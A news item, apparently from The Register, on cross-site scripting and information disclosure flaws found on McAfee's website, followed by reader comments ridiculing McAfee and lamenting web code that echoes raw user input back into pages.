Flaws on McAfee's website leave it vulnerable to cross-site scripting and other attacks, security researchers warn. YGN Ethical Hacker Group also discovered various lesser information disclosure bugs on the security firm's website, according to an advisory published on a full disclosure mailing list on Monday. YGN said it …
Maybe that explains how they took my renewal subscription but failed to renew it, the thiefs.
...you RENEWED? Ooohh, you masochist.
There's so much bad code, though
So many instances of the raw data from the user being echoed directly back int the page:
...and it's variants from other languages - and plenty of books that are only a few years old, where programmers are actively being taught to do this sort of thing. Combine that with all those aging websites that are being "given a new lease of life" by wrapping them in AJAX guff (which no one on the development team really understands) and you've a recipe for ongoing disaster.
"Yeah, let's just response.write everything the user inputs back into the page in real time. If we're really lucky, they might get it into the database - in which case it could lurk there waiting to do its freaky shit, for years to come (because we never sanitise what comes back out of the database, either)."
Doesn't bode well if they've used their own McAfee Secure product to scan their sites to look for vulnerabilities now does it?
Considering you _need_ some kind of accredited, automated penetration testing software to maintain PCI DSS compliance - and McAfee IS one of those accredited suppliers - it doesn't exactly inspire confidence in the system as a whole.
Great story for all the McAfee flashing ads, hilarious that anyone still pays these jokers, everything they make attracts flies very quickly, until it stops steaming.
Intel will fix it and put it in the next version of their "Pentionium"* chips.
We are all gone be safe....we all are
*The name has been made up, like the rest of them.
Hardly a shock...
The only machines I've seen with McAfee running on them are ones that were purchased with the infection already installed!
The numpties in the IT support here at work use it on all the corp desktops (XP, I feel like Fred Flintstone)
"Early on Monday March 28, 2011, various online news outlets reported on vulnerabilities in McAfee Web sites. McAfee is aware of these vulnerabilities and we are working to fix them."
In other words, "We've known about the problems for a while now but couldn't be bothered to fix them until someone aired our dirty laundry in public."
It was all a test...
and we passed. They are glad we finally noticed so that they may put up the real site. A drumroll if you please.
upgrade upgrade upgrade
Intel bought McAfee because it slows PC's down so much you have to upgrade, imagine that upgrade enforcing mechanism built in rather than a user option.
Bring back Dr. Solomons Magic Bullet disks!
Call me dumb but
1) A software company specializing in *security* software is only as good as its reputation. It takes years to build up and days to destroy. RSA springs to mind.
2) Tools exists to scan websites for vulnerabilities. If McAfee can't find one they should have the skills in house to write it.
3)Being owned by Intel should give them access to the corporate coffers if they are stupidly expensive.
Given what they do 1 month should have been *more* than enough time to get the problem elements disabled or replaced.
MaAfee, must be very good?
After all it comes pre-installed on nearly all the computers in our local supermarket, and even if it's not, the McAfee box on the software shelf look just wonderful!!
McAfee is an Anti-virus product???...........
...........I thought it was a performance slug to stop people computing too quickly.
Wow, The Reg has balls...
the industry is entitled to hold McAfee to a higher standard than other organisations, especially given it markets its McAfee Secure service as a way for enterprises to identify problems on their websites. ®
Uh, that would be like holding The Reg to a higher standard of Journalism. No one expects it, and the staff there isn't smart enough to accomplish it.
- Nokia: Read our Maps, Samsung – we're HERE for the Gear
- Ofcom will not probe lesbian lizard snog in new Dr Who series
- Kaspersky backpedals on 'done nothing wrong, nothing to fear' blather
- Episode 9 BOFH: The current value of our IT ASSets? Minus eleventy-seven...
- Too slow with that iPhone refresh, Apple: Android is GOBBLING up US mobile market